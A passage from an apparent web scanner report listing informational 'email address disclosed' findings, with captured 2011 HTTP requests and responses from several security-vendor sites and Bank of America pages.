Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 13:54:46 GMT
Server: Apache
Location: http://mydownload.paretologic.safecart.com/pcha/homepage
Content-Length: 379
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://mydownload.paretologic.safecart.com/pcha
...[SNIP]...
<a href="mailto:systemsupport@revenuewire.com">
...[SNIP]...

24.18. https://secure.comodo.com/management/passwordResetRequest.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.comodo.com
Path:   /management/passwordResetRequest.html

Issue detail

The following email address was disclosed in the response:

Request

GET /management/passwordResetRequest.html HTTP/1.1
Host: secure.comodo.com
Connection: keep-alive
Referer: https://www.comodo.com/login/comodo-members.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wooTracker=ZQXK7Q954RCS6ZFI1HH4JS1QZ5D1UD01

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 23:52:49 GMT
Content-Type: text/html
Last-Modified: Fri, 15 Dec 2006 13:25:17 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 2966

<html>
<head>
<title>Password Reset: Request</title>
<link rel="stylesheet" href="/css/css.css">
<script language="JavaScript" type="text/javascript">
<!--
function loginName_changed(

...[SNIP]...
<a href="mailto:passwordreminder@comodogroup.com?subject=Password%20Reminder">passwordreminder@comodogroup.com</a>
...[SNIP]...

24.19. https://securitymetrics.com/sm/determinesaq/storechd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/determinesaq/storechd

Issue detail

The following email address was disclosed in the response:

Request

GET /sm/determinesaq/storechd HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/pricelist.adp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
Set-Cookie: smsid=868043594333d3db4590b2723770d82890feecf4; Path=/
Date: Tue, 26 Apr 2011 01:08:33 GMT
Server: SecurityMetrics/3.37.1j
Content-Length: 8168


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Deter
...[SNIP]...
<div class="section">
If you need help determining your Merchant SAQ Type please contact a SecurityMetrics Compliance Consultant at 801.705.5665 (USA), 020.7993.8030 (UK) or compliance@securitymetrics.com
</div>
...[SNIP]...

24.20. https://securitymetrics.com/sm/determinesaq/terminaltype  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/determinesaq/terminaltype

Issue detail

The following email address was disclosed in the response:

Request

GET /sm/determinesaq/terminaltype HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/sm/determinesaq/storechd
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
Set-Cookie: smsid=868043594333d3db4590b2723770d82890feecf4; Path=/
Date: Tue, 26 Apr 2011 01:08:49 GMT
Server: SecurityMetrics/3.37.1j
Content-Length: 12217


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Deter
...[SNIP]...
<div class="section">
If you need help determining your Merchant SAQ Type please contact a SecurityMetrics Compliance Consultant at 801.705.5665 (USA), 020.7993.8030 (UK) or compliance@securitymetrics.com
</div>
...[SNIP]...

24.21. https://securitymetrics.com/static/js/controls.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /static/js/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/js/controls.js HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/sm/PANscan/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Accept-Ranges: bytes
ETag: "3843584954"
Last-Modified: Tue, 11 May 2010 16:34:28 GMT
Content-Length: 34787
Date: Tue, 26 Apr 2011 00:53:15 GMT
Server: SecurityMetrics/3.37.1j

// script.aculo.us controls.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009

// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2009 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

24.22. https://store.tenable.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.tenable.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET /?main_page=index&cPath=5 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:49:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22426

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>Perimeter Service : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...
<a href="mailto:sales@tenable.com">sales@tenable.com</a>
...[SNIP]...

24.23. https://store.tenable.com/includes/general.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.tenable.com
Path:   /includes/general.js

Issue detail

The following email address was disclosed in the response:

Request

GET /includes/general.js HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:46:42 GMT
Server: Apache
Last-Modified: Tue, 05 Apr 2005 03:05:36 GMT
ETag: "12ec96-16d2-c0212000"
Accept-Ranges: bytes
Content-Length: 5842
Connection: close
Content-Type: application/x-javascript

//
// +----------------------------------------------------------------------+
// |zen-cart Open Source E-commerce |
// +--------------------------------------
...[SNIP]...
e/2_0.txt. |
// | If you did not receive a copy of the zen-cart license and are unable |
// | to obtain it through the world-wide-web, please send a note to |
// | license@zen-cart.com so we can mail you a copy immediately. |
// +----------------------------------------------------------------------+
// $Id: general.js 1105 2005-04-04 22:05:35Z birdbrain $
//

function
...[SNIP]...

24.24. https://store.tenable.com/includes/templates/tenable/jscript/jquery.hoverIntent.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.tenable.com
Path:   /includes/templates/tenable/jscript/jquery.hoverIntent.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /includes/templates/tenable/jscript/jquery.hoverIntent.min.js HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:46:40 GMT
Server: Apache
Last-Modified: Sat, 11 Sep 2010 21:10:44 GMT
ETag: "12ee2a-646-4bddbd00"
Accept-Ranges: bytes
Content-Length: 1606
Connection: close
Content-Type: application/x-javascript

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @param
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

24.25. https://store.tenable.com/includes/templates/tenable/jscript/jscript_imagehover.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.tenable.com
Path:   /includes/templates/tenable/jscript/jscript_imagehover.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /includes/templates/tenable/jscript/jscript_imagehover.js HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:46:41 GMT
Server: Apache
Last-Modified: Wed, 05 Jan 2011 15:53:32 GMT
ETag: "12ee23-1c93-630ff700"
Accept-Ranges: bytes
Content-Length: 7315
Connection: close
Content-Type: application/x-javascript

/*
Simple Image Trail script- By JavaScriptKit.com
Visit http://www.javascriptkit.com for this script and more
This notice must stay intact

Image Handler Jscript
Version 4.2
fix for horizontalscrollbar 23 june 2010
This version brings in Opera support, and fixes the webkit (Safari and Chrome) Bugs
Modified by Nigel Thomson (nigel@nigel.geek.nz) 12 June 2010
http://nigeltsblog.blogspot.com/2010/06/zencart-image-handler-webkit-and-opera.html

MODIFIED by p.hailey@virgin.net ie 6 fix attempt see zencart forum IH2 thread
Modified by Tim Kroeger (tim@breakmyzencart.com) for use with
image handler 2 and better cross browser functionality
*/
var offsetfrommouse=[10,10]; //image x,y offsets from cursor position in pixels. Enter 0,0 for no offset
var displayduration
...[SNIP]...

24.26. https://store.tenable.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The following email address was disclosed in the response:

Request

GET /index.php?main_page=product_info&cPath=5&products_id=9 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:46:39 GMT
Server: Apache
Set-Cookie: zenid=7fb8442f26d1db353ad8306c5db292f6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 28503

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - $3,600.00 : Tenable Store, Unified Security Monitoring</title>
<meta
...[SNIP]...
<a href="mailto:sales@tenable.com">sales@tenable.com</a>
...[SNIP]...
not be returned. &nbsp;Product cannot be returned after 30 days from purchase date. If you return the product prior to registration within 30 days, there will be a restocking fee. Please contact us at sales@tenable.com to determine the fee.&nbsp;</p>
...[SNIP]...

24.27. https://support.sentrigo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.sentrigo.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: support.sentrigo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSd27384b3a2299db58d67110ef35da57a=kg3uc9rp83bgra0g4d9ddtn3i3; _mkto_trk=id:172-VIM-170&token:_mch-sentrigo.com-1303780496241-25669; __utmz=75719754.1303780499.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=75719754.1100420185.1303780499.1303780499.1303780499.1; __utmc=75719754; __utmb=75719754.1.10.1303780499

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:22:03 GMT
Server: Apache
Set-Cookie: PHPSESSID=anqbi8c98lhrc9t5dv43unlak6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4223
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script language="JavaScri
...[SNIP]...
<a href="mailto:support@sentrigo.com">
...[SNIP]...

24.28. https://support.sentrigo.com/User/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.sentrigo.com
Path:   /User/Login

Issue detail

The following email address was disclosed in the response:

Request

GET /User/Login HTTP/1.1
Host: support.sentrigo.com
Connection: keep-alive
Referer: https://support.sentrigo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSd27384b3a2299db58d67110ef35da57a=kg3uc9rp83bgra0g4d9ddtn3i3; __utmz=75719754.1303780499.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:172-VIM-170&token:_mch-sentrigo.com-1303780496241-25669; PHPSESSID=esjikd3cpu81nqjvdhe9ecrli0; __utma=75719754.1100420185.1303780499.1303780499.1303780499.1; __utmc=75719754; __utmb=75719754.4.10.1303780499

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:27:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3052
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script language="JavaScri
...[SNIP]...
<a href="mailto:support@sentrigo.com">
...[SNIP]...

24.29. https://support.sentrigo.com/js/general/common.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.sentrigo.com
Path:   /js/general/common.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/general/common.js HTTP/1.1
Host: support.sentrigo.com
Connection: keep-alive
Referer: https://support.sentrigo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSd27384b3a2299db58d67110ef35da57a=kg3uc9rp83bgra0g4d9ddtn3i3; __utmz=75719754.1303780499.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:172-VIM-170&token:_mch-sentrigo.com-1303780496241-25669; __utma=75719754.1100420185.1303780499.1303780499.1303780499.1; __utmc=75719754; __utmb=75719754.3.10.1303780499; PHPSESSID=esjikd3cpu81nqjvdhe9ecrli0

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:15:32 GMT
Server: Apache
Last-Modified: Mon, 11 Apr 2011 07:02:01 GMT
ETag: "5380ac-183a-26f9ec40"
Accept-Ranges: bytes
Content-Length: 6202
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

SERVERS = new Array();
SERVERS[1] = new Array("HedgehogServer-jre-installer-4.1.0-15470.exe", 64, false);
SERVERS[2] = new Array("sentrigo-server-jre-4.1.0-15470.i586.rpm.bin", 118, false);
SERVERS[3]
...[SNIP]...
<a href=\"mailto:support@sentrigo.com?subject=Hedgehog sensor availability for additional platform\">
...[SNIP]...
<a href=\"mailto:support@sentrigo.com?subject=Query about Hedgehog Server for additional OS\">
...[SNIP]...
<a href=\"mailto:support@sentrigo.com?subject=Query about IDentifier for additional OS\">
...[SNIP]...

24.30. https://support.tenable.com/support-center/cerberus-support-center/themes/tenable/js/jquery.hoverIntent.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.tenable.com
Path:   /support-center/cerberus-support-center/themes/tenable/js/jquery.hoverIntent.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /support-center/cerberus-support-center/themes/tenable/js/jquery.hoverIntent.min.js HTTP/1.1
Host: support.tenable.com
Connection: keep-alive
Referer: https://support.tenable.com/support-center/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; CerberusPublicGUI=26ko0fk8c8q45fu689ijjmn420

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:48:59 GMT
Server: Apache
Last-Modified: Sat, 11 Sep 2010 21:10:44 GMT
ETag: "64508b-646-4bddbd00"
Accept-Ranges: bytes
Content-Length: 1606
Connection: close
Content-Type: application/x-javascript

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @param
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

24.31. http://threats2.paretologic.revenuewire.net/pcha/download  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://threats2.paretologic.revenuewire.net
Path:   /pcha/download

Issue detail

The following email address was disclosed in the response:

Request

GET /pcha/download?3562113 HTTP/1.1
Host: threats2.paretologic.revenuewire.net
Proxy-Connection: keep-alive
Referer: http://www.cleanallspyware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 14:00:40 GMT
Server: Apache
Location: http://threats2.paretologic.safecart.com/pcha/download?3562113
Content-Length: 383
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://threats2.paretologic.safecart.com/pcha/d
...[SNIP]...
<a href="mailto:systemsupport@revenuewire.com">
...[SNIP]...

24.32. http://www.bankofamerica.com/global/mvc_objects/flyout/HM_ScriptDOM.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/mvc_objects/flyout/HM_ScriptDOM.js

Issue detail

The following email address was disclosed in the response:

Request

GET /global/mvc_objects/flyout/HM_ScriptDOM.js HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/weblinking/?referredby=futurescholar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; throttle_value=35; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; state=MA; CFID=132569126; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; GEOSERVER=2; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:25:56 GMT
Content-length: 46855
Content-type: application/x-javascript
Last-modified: Mon, 23 Feb 2004 21:21:26 GMT
Etag: "b707-403a6ed6"
Accept-ranges: bytes

/*HM_ScriptDOM.js
* by Peter Belesis. v4.3 020605
* Copyright (c) 2002 Peter Belesis. All Rights Reserved.
* Originally published and documented at http://www.dhtmlab.com/
* Available solely from INT Media Group. Incorporated under exclusive license.
* Contact licensing@internet.com for more information.
*/

HM_IE5M = HM_IE && HM_Mac;
HM_NS6 = (navigator.vendor == ("Netscape6") || navigator.product == ("Gecko"));

if(HM_Konqueror) HM_IE = false;
HM_IE5W = HM_IE && !HM_Mac;
HM_IEp
...[SNIP]...

24.33. https://www.bankofamerica.com/www/en_US/global/mvc_objects/flyout/HM_ScriptDOM.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/en_US/global/mvc_objects/flyout/HM_ScriptDOM.js

Issue detail

The following email address was disclosed in the response:

Request

GET /www/en_US/global/mvc_objects/flyout/HM_ScriptDOM.js HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:24:05 GMT
Content-length: 46855
Content-type: application/x-javascript
Last-modified: Thu, 28 Jun 2007 22:05:23 GMT
Etag: "b707-468430a3"
Accept-ranges: bytes

/*HM_ScriptDOM.js
* by Peter Belesis. v4.3 020605
* Copyright (c) 2002 Peter Belesis. All Rights Reserved.
* Originally published and documented at http://www.dhtmlab.com/
* Available solely from INT Media Group. Incorporated under exclusive license.
* Contact licensing@internet.com for more information.
*/

HM_IE5M = HM_IE && HM_Mac;
HM_NS6 = (navigator.vendor == ("Netscape6") || navigator.product == ("Gecko"));

if(HM_Konqueror) HM_IE = false;
HM_IE5W = HM_IE && !HM_Mac;
HM_IEp
...[SNIP]...

24.34. http://www.bridgefront.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bridgefront.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1; __utmc=199010044; __utmb=199010044.2.10.1303780600

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:17:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67939

